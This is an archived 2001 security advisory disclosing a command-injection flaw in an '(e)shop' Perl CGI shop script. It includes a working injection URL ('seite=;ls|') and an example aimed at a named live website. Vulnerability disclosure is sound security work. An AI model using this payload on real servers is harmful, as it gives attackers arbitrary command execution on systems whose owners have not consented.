------------[ advisory ]------------ name: (e)shop Online-Shop System author: WEBDISCOUNT, Inh. Michael Boehme Problem: Script doesnt check for symbol ";". any user can execute any *nix commands on webserver. exploit: host/cgi-bin/eshop.pl?seite=;ls| ex. http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls| Bug found by Kernel|X| [ twisted metal ] E-Mail: [secureat_private] [kernelxat_private] WWW: [ www.tmgroup.sh ] ------------ Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
This archive was generated by hypermail 2b30 : Sun Sep 16 2001 - 17:25:59 PDT